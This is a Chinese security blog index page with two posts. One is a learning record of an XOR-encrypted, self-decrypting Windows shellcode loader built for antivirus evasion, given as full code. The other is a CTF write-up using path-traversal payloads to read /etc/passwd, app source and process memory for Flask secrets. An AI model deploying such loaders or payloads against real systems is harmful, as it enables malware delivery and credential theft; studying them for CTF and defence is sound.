<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<script id="hexo-configurations">
// NexT theme runtime settings, emitted by Hexo at build time (see the
// "generator" meta tag above). Reuse the NexT namespace if a script that ran
// earlier already created it, otherwise start from an empty object.
var NexT = window.NexT || {};
// One generated JSON literal holding the theme options. Presumably consumed by
// the theme's client-side scripts loaded later in the page (not visible here);
// e.g. "localsearch" is enabled and "path" names the index file "search.json".
// Values are generated from the theme config — editing them by hand is likely
// to desync them from the scripts that read them.
var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
</script>
<meta name="description" content="So1Lupus的个人博客">
<meta property="og:type" content="website">
<meta property="og:title" content="So1Lupus">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="So1Lupus">
<meta property="og:description" content="So1Lupus的个人博客">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="So1Lupus">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="http://example.com/">
<script id="page-configurations">
// Page-level flags for the theme scripts (Hexo page variables:
// https://hexo.io/docs/variables.html). This document is the index page,
// not a single post, rendered in zh-CN; "sidebar" is left as an empty string.
CONFIG.page = {
  "sidebar": "",
  "isHome": true,
  "isPost": false,
  "lang": "zh-CN"
};
</script>
<title>So1Lupus</title>
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">So1Lupus</h1>
<span class="logo-line-after"><i></i></span>
</a>
<p class="site-subtitle" itemprop="description">So1Lupus</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup">
<div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off"
placeholder="搜索..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div id="search-result">
<div id="no-result">
<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/4cb58a28.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/4cb58a28.html" class="post-title-link" itemprop="url">计算内存地址实现shellcode自解密</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-28 20:25:25 / 修改时间:20:28:22" itemprop="dateCreated datePublished" datetime="2024-09-28T20:25:25+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<blockquote>
<p> 学习文章出处:<a target="_blank" rel="noopener" href="https://forum.butian.net/share/2669">https://forum.butian.net/share/2669</a></p>
<p> 主要学习了这篇文章的内容并进行复现总结</p>
</blockquote>
<h2 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h2><p> 这篇文章主要就是通过在加载正式的shellcode之前先通过call调用自己写的解密函数对shellcode进行解密,随后进行调用,由于是在内存加载过程中进行解密,并且没有显式调用解密函数,所以从动态免杀角度还是有一定效果的,并且由于shellcode是提前进行加密的,所以从静态免杀角度也有一定的效用。需要说明的是,这种"效果"只是相对于明文 shellcode 而言:下文示例用的是单字节异或(密钥为 3),密钥空间只有 256 个,扫描器可以直接枚举还原;而为了让解密函数能够原地改写并执行 shellcode,链接器把 .data(以及 .text)节设成了 RWE,一个同时可读、可写、可执行的节本身就是很强的静态特征,也违背了 W^X 原则。</p>
<h2 id="二、复现"><a href="#二、复现" class="headerlink" title="二、复现"></a>二、复现</h2><p> 本人复现时使用单字节异或对 shellcode 做简单加密,加密脚本用 golang 编写</p>
<figure class="highlight golang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"> <span class="string">"fmt"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> (</span><br><span class="line"> buf = []<span class="type">byte</span>(<span class="string">""</span>) <span class="comment">//shellcode</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">encode</span><span class="params">(original []<span class="type">byte</span>)</span></span> []<span class="type">byte</span> {</span><br><span class="line"> cipher := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="built_in">len</span>(original))</span><br><span class="line"> <span class="keyword">for</span> i := <span 
class="number">0</span>; i < <span class="built_in">len</span>(buf); i++ {</span><br><span class="line"> cipher[i] = original[i] ^ <span class="number">3</span> <span class="comment">//异或加密</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> cipher</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"> cipher := encode(buf)</span><br><span class="line"> result := <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> _, b := <span class="keyword">range</span> cipher {</span><br><span class="line"> result += fmt.Sprintf(<span class="string">"\\x%02x"</span>, b)</span><br><span class="line"> }</span><br><span class="line"> fmt.Println(<span class="string">"Shellcode length:"</span>, <span class="built_in">len</span>(cipher))</span><br><span class="line"> fmt.Println(<span class="string">"Hex string in \\x format:"</span>, result)</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p> 另外要指出上面 encode 函数里的一个小问题:循环条件写成了 <code>i &lt; len(buf)</code> 而不是 <code>i &lt; len(original)</code>,它之所以能正常工作,只是因为 main 里传入的恰好就是全局变量 buf;一旦 original 与 buf 长度不同,要么加密不完整,要么数组越界 panic,应改为 <code>for i := 0; i &lt; len(original); i++</code>。然后由于是初学者,在加载器编写的过程中遇到了一些问题,在这里一起进行记录:</p>
<ol>
<li>关于访问冲突(access violation):由于在加载shellcode之后要对.data段里的shellcode进行解密操作,所以需要有写权限;又因为下面的代码是直接把 .data 里的 shellcode 当函数调用,所以还需要可执行权限。所以我们需要在开头加上以下内容(注意这是在链接期把整个 .data 节改成 RWE,粒度很粗也很显眼;更常见的做法是运行时用 VirtualAlloc/VirtualProtect 只给 shellcode 所在的内存页临时改权限,下文代码中被注释掉的那一段就是这种写法)</li>
</ol>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">pragma</span> comment(linker, <span class="string">"/section:.data,RWE"</span>)</span></span><br></pre></td></tr></table></figure>
<ol start="2">
<li>Visual Studio 需要关闭所有优化,并且链接器需要关闭引用优化(即 /OPT:NOREF),从而保留未被显式调用的decrypt函数,这样我们才能通过<code>e8 call</code> 调用进行解密。</li>
<li>需要关闭随机基址(ASLR,链接器选项 /DYNAMICBASE:NO),固定基址。严格来说 e8 用的是相对偏移,解密函数和 shellcode 在同一个映像里,整体基址变化并不会改变二者之间的偏移;固定基址主要是让调试器里看到的绝对地址保持稳定,便于反复核对。</li>
</ol>
<p>解决了上述问题后,主要关键就是获取偏移地址,因为e8指令调用是相对偏移地址,然后计算公式是<code>offset = dest - src - 5</code>。这不只是个人实践结论,而是 x86 <code>call rel32</code> 的编码规则:rel32 是相对于<em>下一条指令</em>的地址计算的,而 <code>e8</code> 加上 4 字节偏移恰好是 5 字节,所以 offset = dest - (src + 5)。因此我们只需要在进行函数加载进入内存的时候下一个断点,然后进入汇编来寻找对应的地址。</p>
<img src="/undefined/4cb58a28/image-20240924130357720.png" class="">
<p>这个是decrypt函数的地址,也就是我们跳转的目的地(dest)</p>
<img src="/undefined/4cb58a28/image-20240924130429741.png" class="">
<p>这是我们跳转的出发点也就是src,所以偏移地址就等于0xffffc01b。这个值的最高位为 1,是一个负数的补码表示,说明 decrypt 位于调用点之前;把它填进下面代码里 <code>"\xe8\x00\x00\x00\x00"</code> 的占位字节时要按小端序写,即 <code>"\xe8\x1b\xc0\xff\xff"</code>。当然这个偏移地址不是固定的,每次修改代码都有可能导致地址的变换,需要重新计算。</p>
<img src="/undefined/4cb58a28/image-20240924130500456.png" class="">
<p>这样之后,我们便能够成功解密shellcode并进行上线。</p>
<p>代码如下(注:被注释掉的 VirtualProtect 调用把 lpflOldProtect 参数传成了空指针 tmp,真要启用的话需要改成传一个 DWORD 变量的地址,否则调用会失败;另外 CreateThread 的返回值没有做 NULL 检查,线程句柄也没有 CloseHandle):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">#include <stdio.h></span><br><span class="line">#include <windows.h></span><br><span class="line">#pragma comment(linker, 
"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")</span><br><span class="line">#pragma comment(linker, "/section:.data,RWE")</span><br><span class="line">#pragma comment(linker, "/section:.text,RWE")</span><br><span class="line">unsigned char shellcode[] = "\xe8\x00\x00\x00\x00"; //前五位为e8 call 指令 ,往后为加密的shellcode</span><br><span class="line">typedef void (*CODE)();</span><br><span class="line"></span><br><span class="line">PVOID p = NULL;</span><br><span class="line"></span><br><span class="line">void decrypt()</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> for (int i = 5; i < sizeof(shellcode); i++)</span><br><span class="line"> {</span><br><span class="line"> *(char*)&shellcode[i] = *(char*)&shellcode[i] ^ 3;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">DWORD WINAPI ThreadProc(</span><br><span class="line"> LPVOID lpParameter // thread data</span><br><span class="line">)</span><br><span class="line">{</span><br><span class="line"> // if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)</span><br><span class="line"> // {</span><br><span class="line"> // // MessageBoxW(NULL, L"VirtualAlloc Failed!!!", L"Prompt", MB_OK);</span><br><span class="line"> // return 1;</span><br><span class="line"> // }</span><br><span class="line"> // PDWORD tmp = 0;</span><br><span class="line"> // VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, tmp);</span><br><span class="line"> // 复制 shellcode(原注释为乱码,按下方 memcpy 的语义还原)</span><br><span class="line"> // if (!(memcpy(p, shellcode, sizeof(shellcode))))</span><br><span class="line"> // {</span><br><span class="line"> // // MessageBoxW(NULL, L"WriteMemory Failed!!!", L"Prompt", MB_OK);</span><br><span class="line"> // return 1;</span><br><span class="line"> // }</span><br><span class="line"></span><br><span class="line"> PVOID p = shellcode;</span><br><span 
class="line"> CODE code = (CODE)p;</span><br><span class="line"> code();</span><br><span class="line"></span><br><span class="line"> return 0;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line"> // INT cores = checkCPUCores();</span><br><span class="line"> // if (cores <= 4)</span><br><span class="line"> //{</span><br><span class="line"> // 创建一个新的线程</span><br><span class="line"> ////decrypt();</span><br><span class="line"> HANDLE hThread = ::CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);</span><br><span class="line"> WaitForSingleObject(hThread, INFINITE);</span><br><span class="line"> //}</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h2 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a>三、总结</h2><p> 这只是粗略的自解密学习记录,打算后续结合自增段+段加密进行进一步的加强。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/59bc99f5.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/59bc99f5.html" class="post-title-link" itemprop="url">2023国赛CTF初赛WEB-READIT复现</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2024-09-28 20:20:25 / 修改时间:20:27:43" itemprop="dateCreated datePublished" datetime="2024-09-28T20:20:25+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<blockquote>
<p>在本地搭建环境进行的复现,所以某些地方会与做题时有些许不同,不过并不影响整体做题思路</p>
</blockquote>
<h2 id="0x01-信息搜集"><a href="#0x01-信息搜集" class="headerlink" title="0x01 信息搜集"></a>0x01 信息搜集</h2><p>首先登录界面后,就是一个很简单的web页面。</p>
<img src="/undefined/59bc99f5/image-20230530181449351.png" class="">
<p>点击提交后,我们会发现我们跳转到了另一个页面并且url上多了几个参数。</p>
<img src="/undefined/59bc99f5/image-20230530181537084.png" class="">
<p>此时我们可以猜想,这个book参数是否存在一个目录穿越导致任意文件读的漏洞,于是利用如下payload进行一个初步的验证</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<p>但是发现并不能成功读取文件,那难道是我们的思路有问题吗?</p>
<img src="/undefined/59bc99f5/image-20230530181712589.png" class="">
<p>此时,我们回过头来再想想,这个实现的逻辑是什么,而后端的代码是如何实现这个逻辑的。很显然,这里实现将书籍显示出来的功能肯定要涉及到一个文件读取的逻辑或者文件包含的逻辑,那么肯定有一处参数是涉及这个文件读取的,然后我们回过头来仔细看,这里的选择的书籍名称和book一样(题目环境貌似是相近,没有完全一样),我们有理由肯定此处存在文件读取的功能,那么为什么我们做不到任意文件读呢?有一种可能是存在waf,它将我们的某些字符过滤了,那这里毕竟是ctf比赛,不是真实环境,既然题目的名字也叫readit,那说明这个肯定还是存在一个文件读取的漏洞的。所以把常见的绕过payload都试一试咯,然后如下payload成功读取了文件。(从后面读到的源码可以看出真正的原因:后端只执行了一次 <code>book.replace('..','.')</code>,而不是循环替换到不再含有 <code>..</code> 为止,所以 <code>...</code> 经过一次替换正好又变回 <code>..</code>。这是黑名单式过滤的典型失效方式,稳妥的做法是对拼接后的路径做 <code>os.path.realpath</code> 归一化,再校验它是否仍位于 ./books 目录之内。)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.../.../.../.../.../.../.../etc/passwd</span><br></pre></td></tr></table></figure>
<img src="/undefined/59bc99f5/image-20230530182339485.png" class="">
<p>既然如此我们便可以去读 <code>/proc/self/cmdline</code> 来看下当前执行的是什么命令</p>
<img src="/undefined/59bc99f5/image-20230530182803158.png" class="">
<p>然后发现用gunicorn起了个python服务,所以尝试去读文件源码 <code>/app/server.py</code></p>
<img src="/undefined/59bc99f5/image-20230530183028724.png" class="">
<p>源码如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> math</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, session, render_template, send_file</span><br><span class="line"><span class="keyword">from</span> datetime <span class="keyword">import</span> datetime</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = hashlib.md5(os.urandom(<span class="number">32</span>)).hexdigest()</span><br><span class="line">key = hashlib.md5(<span class="built_in">str</span>(time.time_ns()).encode()).hexdigest()</span><br><span class="line">books = os.listdir(<span class="string">'./books'</span>)</span><br><span class="line">books.sort(reverse=<span class="literal">True</span>)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title 
function_">index</span>():</span><br><span class="line"> <span class="keyword">if</span> session:</span><br><span class="line"> book = session[<span class="string">'book'</span>]</span><br><span class="line"> page = session[<span class="string">'page'</span>]</span><br><span class="line"> page_size = session[<span class="string">'page_size'</span>]</span><br><span class="line"> total_pages = session[<span class="string">'total_pages'</span>]</span><br><span class="line"> filepath = session[<span class="string">'filepath'</span>]</span><br><span class="line"> words = read_file_page(filepath, page, page_size)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, words=words)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books )</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/books'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">book_page</span>():</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'book'</span>):</span><br><span class="line"> book = request.args.get(<span class="string">'book'</span>)</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> book = session.get(<span class="string">'book'</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, message=<span class="string">'I need book'</span>)</span><br><span class="line"> book=book.replace(<span class="string">'..'</span>,<span class="string">'.'</span>)</span><br><span class="line"> filepath = 
<span class="string">'./books/'</span> + book</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'page_size'</span>):</span><br><span class="line"> page_size = <span class="built_in">int</span>(request.args.get(<span class="string">'page_size'</span>))</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> page_size = <span class="built_in">int</span>(session.get(<span class="string">'page_size'</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> page_size = <span class="number">3000</span></span><br><span class="line"> total_pages = math.ceil(os.path.getsize(filepath) / page_size)</span><br><span class="line"> <span class="keyword">if</span> request.args.get(<span class="string">'page'</span>):</span><br><span class="line"> page = <span class="built_in">int</span>(request.args.get(<span class="string">'page'</span>))</span><br><span class="line"> <span class="keyword">elif</span> session:</span><br><span class="line"> page = <span class="built_in">int</span>(session.get(<span class="string">'page'</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> page = <span class="number">1</span></span><br><span class="line"> words = read_file_page(filepath, page, page_size)</span><br><span class="line"> prev_page = page - <span class="number">1</span> <span class="keyword">if</span> page > <span class="number">1</span> <span class="keyword">else</span> <span class="literal">None</span></span><br><span class="line"> next_page = page + <span class="number">1</span> <span class="keyword">if</span> page < total_pages <span class="keyword">else</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"> session[<span class="string">'book'</span>] = book</span><br><span class="line"> session[<span class="string">'page'</span>] = 
page</span><br><span class="line"> session[<span class="string">'page_size'</span>] = page_size</span><br><span class="line"> session[<span class="string">'total_pages'</span>] = total_pages</span><br><span class="line"> session[<span class="string">'prev_page'</span>] = prev_page</span><br><span class="line"> session[<span class="string">'next_page'</span>] = next_page</span><br><span class="line"> session[<span class="string">'filepath'</span>] = filepath</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">'index.html'</span>, books=books, words=words )</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/flag'</span>, methods=[<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">flag</span>():</span><br><span class="line"> <span class="keyword">if</span> hashlib.md5(session.get(<span class="string">'key'</span>).encode()).hexdigest() == key:</span><br><span class="line"> <span class="keyword">return</span> os.popen(<span class="string">'/readflag'</span>).read()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"no no no"</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_file_page</span>(<span class="params">filename, page_number, page_size</span>):</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line"> size=page_size + j</span><br><span class="line"> offset = (page_number - <span 
class="number">1</span>) * page_size+i</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">'rb'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> file.seek(offset)</span><br><span class="line"> words = file.read(size)</span><br><span class="line"> <span class="keyword">return</span> words.decode().split(<span class="string">'\n'</span>)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="comment">#if error again</span></span><br><span class="line"> offset = (page_number - <span class="number">1</span>) * page_size</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(filename, <span class="string">'rb'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> file.seek(offset)</span><br><span class="line"> words = file.read(page_size)</span><br><span class="line"> <span class="keyword">return</span> words.split(<span class="string">b'\n'</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="string">'8000'</span>)</span><br></pre></td></tr></table></figure>
<p>然后发现,想要通过/flag路由拿到flag,我们必须伪造session,此处我们需要两个值:一个是key的值,一个是SECRET_KEY的值。那么我们该如何得到这两个值呢?config文件中也没有泄露。此时我们可以联想到之前2022蓝帽杯的一道web题file_session,有一说一,这个是那题思路的一半部分,有兴趣的可以自己去看看。简单讲就是我们可以通过<strong>/proc/self/maps</strong>获取内存分配,然后再根据内存分配信息在<strong>/proc/self/mem</strong>进行内容的读取。此时我们就需要编写脚本来获取我们想要的内容。</p>
<h2 id="0x02-获取KEY,SECRET-KEY"><a href="#0x02-获取KEY,SECRET-KEY" class="headerlink" title="0x02 获取KEY,SECRET_KEY"></a>0x02 获取KEY,SECRET_KEY</h2><p>此处主要需要根据key和SECRET_KEY的特征来筛选内容,但由于两者都没有明显的特征,编写脚本过程中最难的地方就是找寻特征,最后终于找到了合适的特征来筛选出内容。粗糙的脚本如下,经过测试,大部分情况下都能直接且正确地找到目标;如果第一次运行没有找到,多运行几次便能找到目标。该脚本是在一些大佬的获取内存数据的代码基础上进行了进一步的特征提取,以获取目标值的内容。</p>
